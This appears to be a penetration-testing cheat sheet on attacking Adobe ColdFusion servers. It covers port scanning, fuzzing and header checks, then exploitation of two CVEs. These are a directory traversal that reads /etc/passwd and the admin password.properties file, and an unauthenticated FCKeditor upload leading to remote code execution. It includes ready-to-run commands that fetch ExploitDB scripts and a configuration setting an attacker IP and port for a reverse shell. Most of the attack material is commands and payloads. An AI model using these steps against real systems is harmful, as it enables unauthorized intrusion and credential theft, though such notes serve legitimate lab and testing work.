PRIMARY CATEGORY → WEB TECHNOLOGIES
Theory
TCP Ports
| PORT | PROTOCOL | DESCRIPTION |
|---|---|---|
| 80 | HTTP | Web client and server communication |
| 443 | HTTPS | Encrypted Web client and server communication |
| 1935 | RPC | RPC client and server communication |
| 25 | SMTP | Simple Mail Transfer Protocol to send emails |
| 8500 | SSL | Used for server communication via SSL |
| 5500 | Server Monitor | Used for remote administration of the ColdFusion Server* |
Discovery | Enumeration
Port Scanning
Nmap
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG <TARGET>.allPorts <TARGET>nmap -p"$( grep -ioP --color -- '\s\d{1,5}(?=/open)' <TARGET>.allPorts | xargs | sed 's@\s@,@g' )" -sC -sV -v -n -Pn --disable-arp-ping -oN <TARGET>.targeted <TARGET>Default Files
During the installation process, the COLDFUSION application creates several default files, such as →
<URL>/CFIDE/administrator/index.cfmFuzzing
COLDFUSION web applications typically use .CFM or .CFC file extensions. Therefore, we can try fuzzing for those extensions in the web root or in any previously discovered directory
Ffuf
ffuf -v -t 200 -w '<WORDLIST>' -e '.cfm,.cfc' -u '<URL>/FUZZ'HTTP Headers
Like many others web technologies and applications, we can inspect the headers from the HTTP response
COLDFUSION typically sets specific headers, such as Server: Coldfusion or X-Powered-by: Coldfusion
curl --silent --location --request GET '<URL>' --headIdentifying Vulnerabilities
Searchsploit
searchsploit --www Adobe ColdFusion*Directory Path Traversal ( CVE-2010-2861 ) *
Affected Versions → 9.0.1 and lower
This vulnerability leverages the absence of input validation and sanitization when passing a user input to certain COLDFUSION tags, such as CFFile and CFDirectory
Vulnerable Code
index.cfm
<cfdirectory directory="#ExpandPath('uploads/')#" name="fileList">
<cfloop query="fileList">
<a href="uploads/#fileList.name#">#fileList.name#</a><br>
</cfloop>Payload
<URL>/index.cfm?directory=../../../etc&file=passwdIn this case, this security flaw exists in several endpoints, namely →
<URL>/CFIDE/administrator/settings/mappings.cfm
<URL>/logging/settings.cfm
<URL>/datasources/index.cfm
<URL>/j2eepackaging/editarchive.cfm
<URL>CFIDE/administrator/enter.cfmThe vulnerable parameter is locale, so we can proceed as follows
Exploitation
ExploitDB
- Setup
Installing Python2.7
curl https://pyenv.run | bashexport PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
eval "$(pyenv init -)"pyenv install 2.7.18- Creating a Virtual Environment
pyenv shell 2.7.18 && pip install virtualenv
virtualenv .venv
. !$/bin/activateDownloading the exploit
curl --silent --location --request GET 'https://www.exploit-db.com/raw/14641' --output exploit.py- Usage
python exploit.py 10.129.36.214 8500 ../../../../../../../lib/password.propertiesUnauthenticated RCE ( CVE-2009-2265 )
Affected Versions → 8.0.1 and lower
This security flaw allow unauthenticated users to upload files and gain remote code execution on the target host
In this case, the vulnerability exists on the FCKEditor rather than the COLDFUSION core itself
That said, the vulnerable endpoint is the following →
<URL>/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=ExploitDB
Setup
- Downloading the exploit
curl --silent --location --request GET 'https://www.exploit-db.com/raw/50057' --output exploit.py- Modifying the exploit
We have to modify the following lines with the corresponding data
...<SNIP>...
if __name__ == '__main__':
# Define some information
lhost = '10.10.15.63' # Attacker IP
lport = 1234 # Attacker Port
rhost = '10.129.36.124' # Target IP
rport = 8500 # Target Coldfusion Port
...<SNIP>...Usage
python3 exploit.py